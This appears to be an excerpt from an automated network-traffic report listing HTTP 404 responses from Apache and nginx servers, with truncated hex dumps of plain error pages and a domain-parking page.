Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:09:03 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:09:06 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 77 61 73 68 69 6f 2e 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 12:09:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 